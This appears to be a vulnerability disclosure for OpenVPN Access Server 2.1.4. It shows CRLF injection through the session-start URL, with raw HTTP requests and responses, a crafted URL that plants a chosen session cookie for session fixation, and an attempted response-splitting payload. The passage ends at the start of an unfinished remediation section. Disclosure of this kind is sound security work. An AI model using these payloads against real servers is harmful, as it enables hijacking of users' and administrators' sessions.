OpenVPN Access Server is a full featured secure network tunneling VPN software solution that integrates OpenVPN server capabilities, enterprise management capabilities, simplified OpenVPN Connect UI, and OpenVPN Client software packages that accommodate Windows, MAC, Linux, Android, and iOS environments. OpenVPN Access Server supports a wide range of configurations, including secure and granular remote access to internal network and/ or private cloud network resources and applications with fine-grained access control.
OpenVPN-AS (Version 2.1.4) is prone to CRLF injection. Using the character %0A, it is possible to inject headers and content.
Furthermore, this vulnerability allow us to exploit a session fixation attack. Indeed, during the authentication the session cookie is poorly handled.
We have not been able to exploit it but the application may be prone to HTTP Response Splitting attacks.
Exploiting these vulnerabilities, we were able to steal a session from a victim and then access the application (OpenVPN-AS) with his rights.
Exploiting this on an administrator account may lead to serious consequences.
It is possible to inject a CRLF character like %0A
using the URL : https://www.mysite.com/__session_start__/
GET /__session_start__/%0atest HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie: openvpn_sess_******=******dc61
Pragma: no-cache
Cache-Control: no-cache
As a result, we obtained this response from the server :
HTTP/1.1 302 Found
Date: Wed, 18 Jan 2017 10:19:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Location: https://www.mysite.com/
test
Server: OpenVPN-AS
<html>
<body>
<p>REDIRECT</p>
</body>
</html>
Thus, the %0A
character is taken into account and we can clearly see the test string at an unexpected location.
Using the CRLF injection and a problem during the authentication phase (the session cookie is not re-generated), we were able to successfully exploit a session fixation vulnerability.
In order to exploit this vulnerability, we followed the steps below :
As an example, we aim to inject a Set-Cookie header with a known value :
https://www.mysite.com/__session_start__/%0aSet-Cookie: openvpn_sess_******=******cf23; Path=/; Secure; HttpOnly
This URL will allow the attacker to choose the value of the session cookie of the victim.
We also tried to exploit an HTTP Response Splitting attack without success, for now.
GET /__session_start__/%0aSet-Cookie:%20openvpn_sess_******=******ac42;%20Path=/%0aContent-Length:%200%0a%0aHTTP/1.1%20200%20OK%0aContent-Type:%20text/html%0aContent-Length:%2017%0a%0a<html>TEST</html> HTTP/1.1
Host: www.mysite.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie: openvpn_sess_******=******dc61
Pragma: no-cache
Cache-Control: no-cache
As we can see, it is possible to use multiple times the character %0A, in order to forge another response.
HTTP/1.1 302 Found
Date: Wed, 18 Jan 2017 10:29:23 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Location: https://www.mysite.com/
Set-Cookie: openvpn_sess_******=******ac42; Path=/
Content-Length: 0
Content-Length: 171
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 17
<html>TEST</html>
Server: OpenVPN-AS
3b
<html>
<body>
<p>REDIRECT</p>
</body>
</html>
0
The vendor didn’t provided a patch for this vulnerability. However, several solutions can be taken :
From the vendor side, several steps need to be taken: